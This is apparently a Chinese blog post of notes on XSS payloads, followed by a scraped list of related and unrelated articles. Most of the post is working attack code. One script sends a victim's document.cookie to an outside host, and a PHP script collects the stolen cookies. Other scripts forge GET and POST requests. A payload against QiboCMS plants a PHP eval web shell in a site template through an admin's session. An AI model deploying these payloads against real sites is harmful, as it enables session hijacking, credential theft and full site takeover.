xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

1.盗取cookie,发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie);
4  
5 document.body.appendChild(img);

cookie.php代码

1 <?php
2  
3     $file = fopen("cookie.txt","a");
4  
5     fwrite($file,$_GET['cookie']);
6  
7     fclose($file);
8  
9 ?>

2.构造GET和POST请求

get.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "一个可以使用的get请求链接";
4  
5 document.body.appendChild(img);

post.js代码:

代码1:(DOM节点方式)

01 var f = document.createElement("form");
02  
03 f.action ="";
04  
05 f.method = "post";
06  
07 document.body.appendChild(f);
08  
09 var i1 = document.createElement("input");
10  
11 i1.name = "xxx";
12  
13 i1.value = "xxxx";
14  
15 f.appendChild(i1);
16  
17 var i2 = document.createElement("input");
18  
19 i2.name = "aaa";
20  
21 i2.value = "aaa";
22  
23 f.appendChild(i2);
24  
25 f.submit();

代码2:

1 var dd = document.createElement("div");
2  
3 document.body.appendChild(dd);
4  
5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
6  
7 document.getElementById("xssform").submit();

代码3:(使用XMLHttpRequest)

01 var url = "http://lanu.sinaapp.com";
02  
03 var postStr = "aaa=aaaa&xxx=xxxx";
04  
05 var ajax = null;
06  
07 if(window.XMLHttpRequest)
08  
09 {
10  
11     ajax = new XMLHttpRequest();
12  
13 }
14  
15 else if(window.ActiveXObject)
16  
17 {
18  
19     ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
20  
21 }
22  
23 else
24  
25 {
26  
27     return;
28  
29 }
30  
31 ajax.open("POST", url , true);
32  
33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
34  
35 ajax.send(postStr);
36  
37 //ajax.open("GET", url, true);
38  
39 //ajax.send(null);
40  
41 ajax.onreadystatechange = function()
42  
43 {
44  
45     if(ajax.readyState == 4 && ajax.status == 200)
46  
47     {
48  
49         //alert("Done!");
50  
51     }
52  
53 }

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5.css history hack

http://ha.ckers.org/weird/CSS-history-hack.html

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例:

骑士cms getshell

01 //构造好的能写入一句话的连接
02  
03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
04  
05 try
06  
07 {
08  
09 //调用XMLHttpRequest
10     var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
11  
12     xml.open("POST",'admin_templates.php?act=do_edit',false);
13     xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
14     xml.onreadystatechange = function()
15     {
16         if(xml.readyState == 4)
17  
18         {
19  
20         }
21     }
22     xml.send(Shelldata);
23 }
24 catch(e)
25  
26 {
27  
28 }

xss payload的更多相关文章

  1. ES6中的模板字符串和新XSS Payload

    ES6中的模板字符串和新XSS Payload 众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的 ...

  2. XSS Payload知识备忘

    参考资料:<白帽子讲Web安全>吴翰清 著 参见: 百度百科 http://baike.baidu.com/view/50325.htm 维基百科 http://zh.wikipedia. ...

  3. XSS payload 大全

    收集的一些XSS payload,主要分为五大类,便于查阅. #第一类:Javascript URL <a href="javascript:alert('test')"&g ...

  4. 1.8 收集的XSS Payload

    收集的XSS Payload ,可以做成字典,到时候批量测试:--------------------------------------------------------------------- ...

  5. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  6. XSS Payload深入分析整理

    几种加载XSS Payload的不常见标签 众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x ...

  7. 【命令汇总】XSS payload 速查表

    日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 ...

  8. xssless - 自动化的XSS payload攻击器

    XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法: 记录请求 并结合Burp proxy 选择你想生成的请求,然后右键选择“保存项目” 使用xssless生成你 ...

  9. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

随机推荐

  1. Flash中的注册点和中心点

    用一句话概括注册点和中心点的作用,那就是:注册点用来定位,中心点用来变形 当然,这句话不是非常准确,只是暂时先这么理解,下面会详细讲解. 认识注册点 每个元件都有一个注册点.在元件编辑窗口.或在舞台中 ...

  2. hdu 2044-2050 递推专题

    总结一下做递推题的经验,一般都开成long long (别看项数少,随便就超了) 一般从第 i 项开始推其与前面项的关系(动态规划也是这样),而不是从第i 项推其与后面的项的关系. hdu2044:h ...

  3. poj 1182 (扩展并查集)

    食物链 Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 58979   Accepted: 17247 Description ...

  4. 一个前端资源站 http://www.bootcss.com/

    http://www.bootcss.com/ 里面有w3schools原版的镜像网站地址: https://www.quanzhanketang.com/ 这个网站正常版本被墙了,可以通过这个镜像访 ...

  5. 181. Employees Earning More Than Their Managers

    The Employee table holds all employees including their managers. Every employee has an Id, and there ...

  6. 关于rem的一点总结【原创】

    关于rem的一点总结 最近在写一个关于小说阅读的webApp,由于没有借用任何框架,所以很多底层的内容都需要自己去解决,幸好的是这次只是关于移动端的内容,还不至于去向着jquery的方向码代码.言归正 ...

  7. websocket小荔枝

    关于websocket原理和好处请参考百度,这里只是代码. var ws = new WebSocket('ws://echo.websocket.org/'); ws.onopen = functi ...

  8. hdu 4135 Co-prime (素数打表+容斥原理)

    题目链接 题意:问从A到B中与N互素的个数. 题解: 利用容斥原理:先求出与n互为素数的个数. 可以先将 n 进行素因子分解,然后用区间 x 除以 素因子,就得到了与 n 的 约数是那个素因子的个数, ...

  9. Spring.NET学习笔记1——控制反转(基础篇)

    在学习Spring.NET这个控制反转(IoC)和面向切面(AOP)的容器框架之前,我们先来看一下什么是控制反转(IoC). 控制反转(Inversion of Control,英文缩写为IoC),也 ...

  10. 590. N叉树的后序遍历

    给定一个 N 叉树,返回其节点值的后序遍历. 例如,给定一个 3叉树 : 返回其后序遍历: [5,6,3,2,4,1]. 说明: 递归法很简单,你可以使用迭代法完成此题吗? /* // Definit ...